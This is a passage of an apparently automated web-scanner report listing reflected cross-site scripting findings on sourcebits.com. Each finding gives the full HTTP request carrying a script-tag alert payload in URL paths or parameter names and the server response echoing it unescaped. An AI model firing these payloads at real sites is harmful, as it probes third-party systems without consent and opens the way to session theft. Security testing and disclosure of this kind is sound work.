Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/images/logo/favicon.png14834<a>922a4dbb0ba?1288800918</h2>
...[SNIP]...

1.67. http://www.sourcebits.com/ipad [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /ipad

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b4c8<script>alert(1)</script>34e5d6250df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad9b4c8<script>alert(1)</script>34e5d6250df HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/ipad9b4c8<script>alert(1)</script>34e5d6250df</h2>
...[SNIP]...

1.68. http://www.sourcebits.com/ipad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /ipad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a704d<script>alert(1)</script>029b51e6ee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad?a704d<script>alert(1)</script>029b51e6ee8=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/ipad?a704d<script>alert(1)</script>029b51e6ee8=1</h2>
...[SNIP]...

1.69. http://www.sourcebits.com/iphone [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /iphone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96988<script>alert(1)</script>b6d9a28df5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone96988<script>alert(1)</script>b6d9a28df5a HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/iphone96988<script>alert(1)</script>b6d9a28df5a</h2>
...[SNIP]...

1.70. http://www.sourcebits.com/iphone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32af5<script>alert(1)</script>01277e9ffb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone?32af5<script>alert(1)</script>01277e9ffb7=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/iphone?32af5<script>alert(1)</script>01277e9ffb7=1</h2>
...[SNIP]...

1.71. http://www.sourcebits.com/js/blogger.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/blogger.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0bcd<script>alert(1)</script>3024933c577 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd0bcd<script>alert(1)</script>3024933c577/blogger.js?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsd0bcd<script>alert(1)</script>3024933c577/blogger.js?1284110529</h2>
...[SNIP]...

1.72. http://www.sourcebits.com/js/blogger.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/blogger.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb3c"><script>alert(1)</script>92e1ce5f7df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsacb3c"><script>alert(1)</script>92e1ce5f7df/blogger.js?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsacb3c"><script>alert(1)</script>92e1ce5f7df/blogger.js?1284110529" />
...[SNIP]...

1.73. http://www.sourcebits.com/js/blogger.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/blogger.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5afe6"><script>alert(1)</script>8088e722c34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/blogger.js5afe6"><script>alert(1)</script>8088e722c34?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/blogger.js5afe6"><script>alert(1)</script>8088e722c34?1284110529" />
...[SNIP]...

1.74. http://www.sourcebits.com/js/blogger.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/blogger.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be8de<script>alert(1)</script>4233d99b3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/blogger.jsbe8de<script>alert(1)</script>4233d99b3dc?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/blogger.jsbe8de<script>alert(1)</script>4233d99b3dc?1284110529</h2>
...[SNIP]...

1.75. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/css-browser-selector.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cb44<script>alert(1)</script>2fea1448aa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9cb44<script>alert(1)</script>2fea1448aa8/css-browser-selector.js?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js9cb44<script>alert(1)</script>2fea1448aa8/css-browser-selector.js?1276841695</h2>
...[SNIP]...

1.76. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/css-browser-selector.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d99"><script>alert(1)</script>32a93e1420a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd8d99"><script>alert(1)</script>32a93e1420a/css-browser-selector.js?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsd8d99"><script>alert(1)</script>32a93e1420a/css-browser-selector.js?1276841695" />
...[SNIP]...

1.77. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/css-browser-selector.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cced1<script>alert(1)</script>d84f8622f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/css-browser-selector.jscced1<script>alert(1)</script>d84f8622f?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/css-browser-selector.jscced1<script>alert(1)</script>d84f8622f?1276841695</h2>
...[SNIP]...

1.78. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/css-browser-selector.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a593"><script>alert(1)</script>c20a44d12a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/css-browser-selector.js7a593"><script>alert(1)</script>c20a44d12a0?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/css-browser-selector.js7a593"><script>alert(1)</script>c20a44d12a0?1276841695" />
...[SNIP]...

1.79. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2319<script>alert(1)</script>c4d061b17c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsf2319<script>alert(1)</script>c4d061b17c6/jquery-1.3.2.min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:08 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsf2319<script>alert(1)</script>c4d061b17c6/jquery-1.3.2.min.js?1265536927</h2>
...[SNIP]...

1.80. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0778"><script>alert(1)</script>9258e0f3f6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsb0778"><script>alert(1)</script>9258e0f3f6f/jquery-1.3.2.min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:05 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsb0778"><script>alert(1)</script>9258e0f3f6f/jquery-1.3.2.min.js?1265536927" />
...[SNIP]...

1.81. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9fa9<script>alert(1)</script>9166bedf7fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.3.2.min.jsf9fa9<script>alert(1)</script>9166bedf7fc?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

